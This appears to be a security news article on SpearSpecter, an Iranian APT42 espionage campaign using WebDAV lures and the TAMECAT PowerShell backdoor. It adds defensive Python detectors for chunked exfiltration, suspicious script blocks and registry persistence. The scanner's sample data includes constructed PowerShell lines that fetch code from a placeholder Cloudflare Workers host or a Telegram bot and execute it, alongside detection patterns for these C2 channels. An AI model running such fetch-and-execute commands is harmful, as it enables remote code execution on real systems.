Iranian Hackers Target Defense and Government Officials in Expansive SpearSpecter Espionage Campaign

The SpearSpecter espionage campaign is one of the most advanced and sustained nation state cyber operations currently active, targeting senior defense officials, government personnel, policy experts, researchers, and individuals connected to high value decision making. According to new research published by the Israel National Digital Agency, SpearSpecter is operated by Iranian threat actors aligned with the Islamic Revolutionary Guard Corps Intelligence Organization. The group is widely known under multiple aliases including APT42, Mint Sandstorm, CharmingCypress, Educated Manticore, and UNC788. The operation blends long term social engineering, cloud based command channels, fileless malware, and multi channel data exfiltration, and it exemplifies the modern evolution of state sponsored espionage.

The SpearSpecter campaign demonstrates a high maturity level in both operational security and tailored targeting. Unlike broad phishing operations, this campaign focuses on building relationships with specific individuals who have strategic value. Operators spend days or weeks engaging targets using detailed knowledge gathered from social media, public biographies, academic publications, conference lists, and professional networks. Victims reported receiving personalized invitations to international summits, intelligence oriented working groups, and diplomatic round tables. In many cases, family members are approached to increase psychological pressure and to widen the attack surface. Communication often continues through WhatsApp to reinforce trust and authenticity, making the social engineering extremely difficult to detect.

Relationship Building and Social Engineering Tradecraft

SpearSpecter’s initial access phase stands out due to its sophistication. Operators perform detailed reconnaissance on each target before initiating communication. The threat actor constructs believable personas, often impersonating researchers, diplomats, policy advisors, or representatives from institutions directly relevant to the victim’s professional interests. These personas invite targets to view documents or confirm meeting details hosted on services such as OneDrive or Google Drive. Behind these credible façades, hidden redirects silently execute in the background and lead victims through an infection chain controlled by the attackers.

If credential harvesting is the objective, victims are redirected to spoofed meeting pages or cloned authentication portals that capture passwords in real time. If long term access is desired, the campaign deploys TAMECAT, a modular, fileless, PowerShell based backdoor designed for persistence, reconnaissance, command execution, and multi stage data theft. SpearSpecter selects the infection method based on the victim’s value and the depth of access required.

Initial Access Through WebDAV Lures and LNK Shortcuts

A hallmark of the SpearSpecter infection chain is the abuse of the Windows search-ms URI protocol. The lure link redirects the victim to a crafted page that triggers a prompt asking to open Windows Explorer. If the user accepts, the system connects to an attacker controlled WebDAV server and displays a malicious LNK file disguised as a PDF document. When executed, the LNK silently uses curl to download and run a batch script hosted on Cloudflare Workers. This batch script loads highly obfuscated PowerShell that fetches TAMECAT modules and runs them in memory.

This smooth transition from legitimate cloud platforms to attacker infrastructure makes the campaign extremely difficult for automated security tools to detect. Because the attacker never directly sends an executable file, traditional email or attachment scanning provides little protection. The WebDAV technique ensures initial access without immediately exposing the presence of malware.

TAMECAT: Modular Fileless Malware With Multi Channel Command and Control

TAMECAT is the core of the SpearSpecter intrusion. It uses a modular architecture designed to dynamically receive encrypted payloads, load them in memory, and execute them without writing persistent binaries to disk. This reduces forensic traces and complicates detection by traditional endpoint solutions.

[Figure] TAMECAT’s In-Memory Loader Chain. (Source: govextra.gov.il)

TAMECAT includes modules for system reconnaissance, file harvesting, browser data theft, screenshot capture, network discovery, credential extraction, remote command execution, and encrypted multi channel exfiltration. Modules are delivered through HTTPS, Telegram, and Discord, giving the operator multiple redundant command paths that increase resilience and complicate analysis.

Telegram Based Command and Control

One of SpearSpecter’s most notable advancements is the use of Telegram as a full command and control channel. TAMECAT monitors incoming messages from the attacker’s Telegram bot. If a message matches a predefined command name, the malware retrieves a payload from the attacker’s Cloudflare Workers infrastructure and executes it. If the message does not match a known command but is not an exit instruction, it is treated as raw PowerShell code and executed. Results are sent back to the attacker as Telegram messages.

This technique allows the attacker to maintain stealth and reliability because Telegram traffic looks identical to normal encrypted messaging traffic. Detection tools rarely flag legitimate messaging service connections.

Discord Based Command and Control

The campaign also uses Discord channels for C2. TAMECAT retrieves commands from a hardcoded channel ID using a bot token. The malware filters messages by author name to locate tasking instructions. Attached files contain encrypted PowerShell payloads that TAMECAT decrypts and executes in memory. After retrieving messages, the malware stores the last processed message ID in the registry to avoid replaying commands. This system allows coordinated management of multiple compromised hosts through a single Discord channel, a method that blends in with everyday internet activity.

System Reconnaissance and Document Harvesting

TAMECAT’s reconnaissance modules gather OS information, installed software, user privileges, process listings, network configuration, and system uptime. These modules also enumerate antivirus products and prepare selected files for exfiltration. The malware searches the entire filesystem for high value document types including PDFs, Office documents, password manager databases, cloud document formats, spreadsheets, Zip archives, and multimedia files. Paths are encoded in Base64 and stored in staging files such as ALL.txt under the user’s local cache directories.

Metadata is stored in FileCrawler.txt, providing the attacker detailed insight into the victim’s documents before extraction. TAMECAT avoids directories that create excessive noise such as OneDrive or large development environments. This selective targeting highlights the intelligence gathering nature of the campaign.

Browser Data Extraction

TAMECAT employs two advanced browser data theft techniques. For Microsoft Edge, the malware launches the browser in hidden mode with remote debugging enabled. It then connects to the debugging interface and requests decrypted cookies and session data directly from DevTools APIs. This bypasses the need to manually decrypt SQLite databases.

For Chrome, TAMECAT temporarily suspends the browser’s process using PsSuspend. With the process paused, database locks are released, enabling safe copying and decryption of sensitive browser files, including password databases and cookies. These are then parsed to extract login entries and browsing history.

Screenshot Capture and Email Collection

TAMECAT captures 50 screenshots at 15 second intervals and uploads each image before deleting it from disk. The malware also targets Outlook OST files, copying and exfiltrating entire mailbox archives for intelligence value. This reinforces SpearSpecter’s focus on long term espionage rather than rapid monetization or disruptive operations.

Chunked Data Exfiltration and Cloud Based Infrastructure

TAMECAT compresses stolen data using a renamed WinRAR utility and uploads it in 5 megabyte chunks using Runs.dll, a helper library that reads only small ranges from each file to avoid loading large files in memory. The malware sends each chunk inside an encrypted JSON envelope over HTTPS, FTP, or the same C2 channels used for command delivery.

This controlled staging and chunked transfer method evades large file detection and ensures reliable exfiltration even when network interruptions occur.
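The 5 megabyte chunking described above leaves a network-level trace of its own: a single host sending a run of uploads of almost identical size to one destination. The following detector is an added example written for this article, not code from the INDA report or from TAMECAT; it runs over a constructed web proxy log (the column layout, host names and byte counts are invented for the example, and the size tolerance, minimum run length and minimum volume are assumed thresholds to tune against your own traffic). It groups client uploads by source and destination, finds the uploads clustered around the median size, and alerts when enough uniform chunks add up to a meaningful volume.

```python
import re
from collections import defaultdict
from statistics import median

# Constructed proxy records (not real traffic): timestamp, source host, HTTP
# method, destination host, bytes sent by the client. Adapt LOG_LINE to your
# proxy's schema; only the client-bytes column matters for the heuristic.
SAMPLE_PROXY_LOG = """
2025-11-10T09:01:02Z wks-03 GET  intranet.example.test 412
2025-11-10T09:01:05Z wks-03 POST intranet.example.test 1200
2025-11-10T09:02:11Z wks-03 POST intranet.example.test 340
2025-11-10T09:03:40Z wks-03 POST intranet.example.test 88000
2025-11-10T09:04:02Z wks-03 POST intranet.example.test 4500
2025-11-10T09:10:01Z wks-17 POST storage.example-bucket.test 5244100
2025-11-10T09:10:09Z wks-17 POST storage.example-bucket.test 5244130
2025-11-10T09:10:17Z wks-17 POST storage.example-bucket.test 5244090
2025-11-10T09:10:25Z wks-17 POST storage.example-bucket.test 5244110
2025-11-10T09:10:33Z wks-17 POST storage.example-bucket.test 5244120
2025-11-10T09:10:41Z wks-17 POST storage.example-bucket.test 2017331
2025-11-10T09:12:00Z wks-09 PUT  backup.example.test 5244100
2025-11-10T09:12:30Z wks-09 PUT  backup.example.test 5244100
2025-11-10T09:13:00Z wks-09 PUT  backup.example.test 5244100
"""

LOG_LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<src>\S+)\s+(?P<method>[A-Z]+)\s+(?P<dest>\S+)\s+(?P<bytes>\d+)$"
)


def parse_proxy_log(text):
    """Yield (src, method, dest, client_bytes) for every well-formed line."""
    for line in text.splitlines():
        m = LOG_LINE.match(line.strip())
        if m:
            yield m.group("src"), m.group("method"), m.group("dest"), int(m.group("bytes"))


def uniform_upload_runs(text, min_uploads=4, tolerance=0.02, min_total=16 * 1024 * 1024):
    """Flag (src, dest) pairs that sent a run of near-identical-size uploads.

    tolerance is the allowed deviation from the median upload size (the JSON
    envelope adds a little overhead per chunk, so sizes are close, not equal);
    the final, smaller remainder chunk is deliberately left out of the run.
    These thresholds are assumptions for the example, not published values.
    """
    uploads = defaultdict(list)
    for src, method, dest, size in parse_proxy_log(text):
        if method in ("POST", "PUT"):
            uploads[(src, dest)].append(size)

    alerts = []
    for (src, dest), sizes in uploads.items():
        if len(sizes) < min_uploads:
            continue
        mid = median(sizes)
        uniform = [s for s in sizes if abs(s - mid) <= tolerance * mid]
        if len(uniform) >= min_uploads and sum(uniform) >= min_total:
            alerts.append({
                "src": src,
                "dest": dest,
                "uploads": len(uniform),
                "chunk_bytes": int(mid),
                "total_bytes": sum(uniform),
            })
    return sorted(alerts, key=lambda a: -a["total_bytes"])


if __name__ == "__main__":
    for alert in uniform_upload_runs(SAMPLE_PROXY_LOG):
        print(f"{alert['src']} -> {alert['dest']}: {alert['uploads']} chunks of "
              f"~{alert['chunk_bytes']} bytes, {alert['total_bytes']} bytes total")
```

In the sample, wks-03 has varied upload sizes and wks-09 has too few uploads to form a run, so only wks-17 is reported. The heuristic is destination-agnostic on purpose: the article notes that chunks travel over HTTPS, FTP or the same Telegram and Discord channels used for tasking, so keying on a known-bad host would miss the pattern.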

Obfuscation, Stealth, and Living Off The Land

The campaign uses extensive obfuscation including:

  • String reconstruction from hundreds of fragments
  • Encrypted payload blobs stitched together at runtime
  • Wildcard resolution of PowerShell commands to evade signature based detection
  • Use of trusted binaries such as conhost.exe, curl.exe, and msedge.exe
  • Heavy reliance on in memory execution to minimize disk artifacts

Everything about TAMECAT’s design prioritizes stealth, persistence, and flexibility.
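The first recommendation below, PowerShell script block logging, only helps if someone scores what gets logged. The scanner that follows is an added example written for this article, not code from the INDA report or from TAMECAT itself. It turns the behaviours described in the obfuscation list and in the Telegram and Discord C2 sections (wildcard resolution of PowerShell commands, string reconstruction from many fragments, curl fetching from Cloudflare Workers, polling of the Telegram bot API or a Discord channel, and decode-then-execute of payloads) into weighted indicators and runs them over constructed script text of the kind that Event ID 4104 records would carry. The regexes, weights and threshold are the example's own assumptions; the host names, domains and tokens in the samples are placeholders.

```python
import re
from dataclasses import dataclass

# Indicator rules. The behaviours come from the SpearSpecter write-up; the
# regexes and weights are this example's own assumptions, not published rules.
RULES = {
    "wildcard_command_resolution": (re.compile(r"(?i)\b(?:gcm|get-command)\b[^;\n]*\*"), 4),
    "curl_to_cloudflare_workers":  (re.compile(r"(?i)\bcurl(?:\.exe)?\b[^;\n]*workers\.dev"), 4),
    "telegram_bot_api":            (re.compile(r"(?i)api\.telegram\.org/bot"), 4),
    "discord_channel_api":         (re.compile(r"(?i)discord(?:app)?\.com/api/(?:v\d+/)?channels/"), 4),
}
EXEC_PATTERN = re.compile(r"(?i)\biex\b|invoke-expression")
# Many tiny single-quoted fragments joined with '+' is the string-reconstruction
# pattern. On its own it is weak evidence, so it scores low.
FRAGMENT_JOIN = re.compile(r"'[^']{1,3}'\s*\+\s*(?='[^']{1,3}')")
FRAGMENT_THRESHOLD = 5


@dataclass
class Finding:
    host: str
    score: int
    indicators: list


def score_block(host: str, script_text: str) -> Finding:
    """Score one logged script block against the indicator rules."""
    indicators, score = [], 0
    for name, (pattern, weight) in RULES.items():
        if pattern.search(script_text):
            indicators.append(name)
            score += weight
    # Decoding Base64 and handing the result to Invoke-Expression in the same
    # block is the in-memory execution pattern the article describes.
    if "FromBase64String" in script_text and EXEC_PATTERN.search(script_text):
        indicators.append("base64_decode_then_execute")
        score += 3
    joins = len(FRAGMENT_JOIN.findall(script_text))
    if joins >= FRAGMENT_THRESHOLD:
        indicators.append(f"string_fragment_reconstruction:{joins}_joins")
        score += 3
    return Finding(host, score, indicators)


def triage(blocks, threshold=4):
    """Return findings at or above the threshold, highest score first."""
    scored = (score_block(host, text) for host, text in blocks)
    return sorted((f for f in scored if f.score >= threshold), key=lambda f: -f.score)


# Constructed samples shaped like the script text of Script Block Logging
# events (Event ID 4104). None of this is TAMECAT's code; tokens, domains and
# channel IDs are placeholders.
SAMPLE_BLOCKS = [
    ("wks-01", r"Get-ChildItem -Path C:\Logs -Recurse | Where-Object { $_.Length -gt 1MB } | Sort-Object Length"),
    ("wks-02", r"$c='I'+'n'+'v'+'o'+'k'+'e'+'-'+'Ex'+'pr'; & (gcm ($c+'*')) (curl.exe -s https://example-stage.workers.dev/s1.txt)"),
    ("wks-03", r'$r = Invoke-RestMethod "https://api.telegram.org/bot<TOKEN_PLACEHOLDER>/getUpdates"; IEX ([Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($r.result[0].message.text)))'),
    ("wks-04", r'Invoke-RestMethod -Headers @{Authorization="Bot <TOKEN_PLACEHOLDER>"} "https://discord.com/api/v10/channels/000000000000000000/messages"'),
    ("wks-05", r"$greeting='He'+'l'+'lo'+', '+'wor'+'ld'; Write-Output $greeting"),
]

if __name__ == "__main__":
    for f in triage(SAMPLE_BLOCKS):
        print(f"{f.host}: score={f.score} indicators={f.indicators}")
```

wks-01 (ordinary administration) scores nothing and wks-05 (a harmless concatenation) stays below the threshold, while each of the C2 and loader patterns is strong enough to surface on its own. The fragment rule is kept cheap on purpose: in real telemetry it earns its keep only in combination with a command-resolution or network indicator.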

Persistence Mechanisms

SpearSpecter maintains persistence using multiple methods including a Run key named Renovation that launches an obfuscated batch file which in turn executes TAMECAT. It also uses the UserInitMprLogonScript registry key to launch another hidden batch script that posts heartbeat signals to a Firebase database. This script uses curl to send encrypted JSON containing timestamps and system identifiers, providing the attacker continuous awareness of active hosts.
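Both persistence locations named above are visible in a plain registry export, which makes them easy to sweep for across a fleet. The hunt below is an added example written for this article, not tooling from the INDA report. It parses a constructed .reg export (user name, paths and the benign OneDrive entry are invented for the sample; the sample places UserInitMprLogonScript under HKCU\Environment, but the hunt matches that value by name wherever it appears) and reports a Run value named Renovation, any UserInitMprLogonScript value, and, as an added heuristic of the example's own, any Run value that launches a .bat or .cmd file from under the user's AppData folder, since the article describes Renovation launching an obfuscated batch file.

```python
import re

# Constructed registry export (not from a real host). Paths are placeholders.
SAMPLE_REG_EXPORT = r"""
Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"OneDrive"="\"C:\\Users\\alice\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"Renovation"="C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\run.bat"

[HKEY_CURRENT_USER\Environment]
"Path"="C:\\Users\\alice\\AppData\\Local\\Microsoft\\WindowsApps"
"UserInitMprLogonScript"="C:\\Users\\alice\\AppData\\Local\\Temp\\upd\\hb.bat"
"""

REG_SECTION = re.compile(r"^\[(?P<key>[^\]]+)\]$")
REG_STRING_VALUE = re.compile(r'^"(?P<name>[^"]+)"="(?P<data>.*)"$')
RUN_KEY = re.compile(r"(?i)\\currentversion\\run(?:once)?$")
# Heuristic (this example's assumption): a batch launcher under the profile.
USER_PROFILE_BATCH = re.compile(r"(?i)\\appdata\\.*\.(?:bat|cmd)\b")


def parse_reg_export(text):
    """Yield (key, value_name, data) for each string value in a .reg export."""
    key = None
    for raw in text.splitlines():
        line = raw.strip()
        m = REG_SECTION.match(line)
        if m:
            key = m.group("key")
            continue
        m = REG_STRING_VALUE.match(line)
        if m and key is not None:
            # .reg files double every backslash and escape embedded quotes.
            data = m.group("data").replace("\\\\", "\\").replace('\\"', '"')
            yield key, m.group("name"), data


def hunt_persistence(text):
    """Return the values that match the SpearSpecter persistence indicators."""
    findings = []
    for key, name, data in parse_reg_export(text):
        reasons = []
        if RUN_KEY.search(key):
            if name.lower() == "renovation":
                reasons.append("run_value_named_Renovation")
            if USER_PROFILE_BATCH.search(data):
                reasons.append("batch_launcher_in_user_profile")
        if name.lower() == "userinitmprlogonscript":
            reasons.append("userinitmprlogonscript_value_present")
        if reasons:
            findings.append({"key": key, "name": name, "data": data, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in hunt_persistence(SAMPLE_REG_EXPORT):
        print(f"{f['key']} :: {f['name']} = {f['data']}  [{', '.join(f['reasons'])}]")
```

The OneDrive value passes because it is an .exe, and the Path value passes because it is neither a Run entry nor the logon script value, so the output is exactly the two entries the article warns about. The heuristic will also catch a renamed copy of the same launcher, which a name-only check would miss.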

Infrastructure and Attribution

The SpearSpecter infrastructure combines attacker controlled servers with commodity cloud services such as Somee, Scalingo, Cloudflare Workers, Tebi, Google Firebase, Discord, and Telegram. The distributed and disposable nature of the infrastructure aligns with publicly documented APT42 tradecraft. The WebDAV servers, search-ms abuse, TAMECAT tooling, and multichannel C2 strongly match techniques associated with IRGC aligned operators.

The Israel National Digital Agency (INDA) attributes this campaign with high confidence to APT42 based on the overlap in tooling, network infrastructure, social engineering approach, and operational discipline. The campaign’s focus on high ranking defense officials and decision makers reinforces the conclusion that the operation is intended to gather intelligence on behalf of the IRGC intelligence directorate.

Recommendations

Organizations at elevated risk of espionage should adopt the following steps:

  • Enable PowerShell script block logging and AMSI integration
  • Deploy EDR solutions capable of detecting in memory activity
  • Disable the search-ms protocol to prevent WebDAV based delivery
  • Monitor for anomalous Telegram or Discord traffic
  • Deploy strong network baselining to detect unusual access patterns
  • Provide senior officials with targeted awareness training
  • Filter or block Cloudflare Workers traffic when appropriate
  • Monitor for registry persistence keys such as Renovation and UserInitMprLogonScript


Sean Doyle

Sean is a tech author and security researcher with more than 20 years of experience in cybersecurity, privacy, malware analysis, analytics, and online marketing. He focuses on clear reporting, deep technical investigation, and practical guidance that helps readers stay safe in a fast-moving digital landscape. His work continues to appear in respected publications, including articles written for Private Internet Access. Through Botcrawl and his ongoing cybersecurity coverage, Sean provides trusted insights on data breaches, malware threats, and online safety for individuals and businesses worldwide.
